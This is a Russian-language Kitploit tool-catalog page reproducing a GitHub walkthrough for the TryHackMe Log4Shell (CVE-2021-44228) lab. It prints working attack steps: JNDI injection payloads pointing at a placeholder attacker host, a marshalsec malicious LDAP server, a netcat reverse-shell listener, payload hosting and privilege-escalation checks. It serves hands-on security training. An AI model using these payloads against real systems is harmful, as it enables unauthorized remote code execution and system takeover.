Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Solar-exploiting-log-4j — Пошаговое прохождение TryHackMe по эксплуатации уязвимости Log4Shell (CVE-2021-44228) для достижения удаленного выполнения кода и получения флагов. | Kitploit
Инструменты/GitHubGitHub/lathika-3006/solar-exploiting-log-4j
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияОбратная инженерияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHublathika-3006/solar-exploiting-log-4j

Solar-exploiting-log-4j

Пошаговое прохождение TryHackMe по эксплуатации уязвимости Log4Shell (CVE-2021-44228) для достижения удаленного выполнения кода и получения флагов.

Репозиторий
2115 месяцев назадЕщё не проверено

🔥 Solar Exploiting Log4j - Прохождение TryHackMe

📌 Комната: Solar Exploiting Log4j

Платформа: TryHackMe Сложность: Средняя Тема: Log4Shell (Уязвимость Log4j)


🧠 Цель

Эксплуатировать уязвимость Log4j (CVE-2021-44228) для получения удаленного выполнения кода и захвата флагов.


🛠️ Используемые инструменты

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 Шаг 1: Разведка

🔍 Сканирование цели

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Результаты

  • Открытые порты: 80 (HTTP), другие в зависимости от комнаты
  • Веб-приложение с бэкендом на Java

🌐 Шаг 2: Веб-разведка

  • Посетите веб-приложение в браузере
  • Взаимодействуйте с полями ввода (логин/поиск/заголовки)
  • Перехватите запрос с помощью Burp Suite

💥 Шаг 3: Определение уязвимости Log4j

Уязвимость Log4j позволяет внедрение JNDI:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

Если ввод попадает в лог — уязвимость существует.


⚙️ Шаг 4: Настройка слушателя

Запуск Netcat

root@kitploit:~
nc -lvnp 4444

Запуск вредоносного LDAP-сервера (пример)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

Запуск LDAP-сервера:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 Шаг 5: Размещение полезной нагрузки

root@kitploit:~
python3 -m http.server 8000

Создайте вредоносный Java-класс (Exploit.class)


🚀 Шаг 6: Запуск эксплойта

Вставьте полезную нагрузку в уязвимое поле:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 Используйте заголовки, такие как:

  • User-Agent
  • X-Api-Version

🖥️ Шаг 7: Получение обратной оболочки

После запуска:

  • Цель подключается обратно к слушателю Netcat
  • Вы получаете доступ к оболочке

🔐 Шаг 8: Повышение привилегий (если требуется)

Проверьте:

root@kitploit:~
sudo -l

Ищите:

  • Неправильно настроенные SUID-бинарники
  • Файлы доступные для записи
  • Cron-задачи

🚩 Шаг 9: Захват флагов

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 Ключевые изученные концепции

  • Log4Shell (CVE-2021-44228)
  • JNDI-инъекция
  • Удаленное выполнение кода (RCE)
  • Обратная оболочка
  • Веб-эксплуатация
Скачать инструмент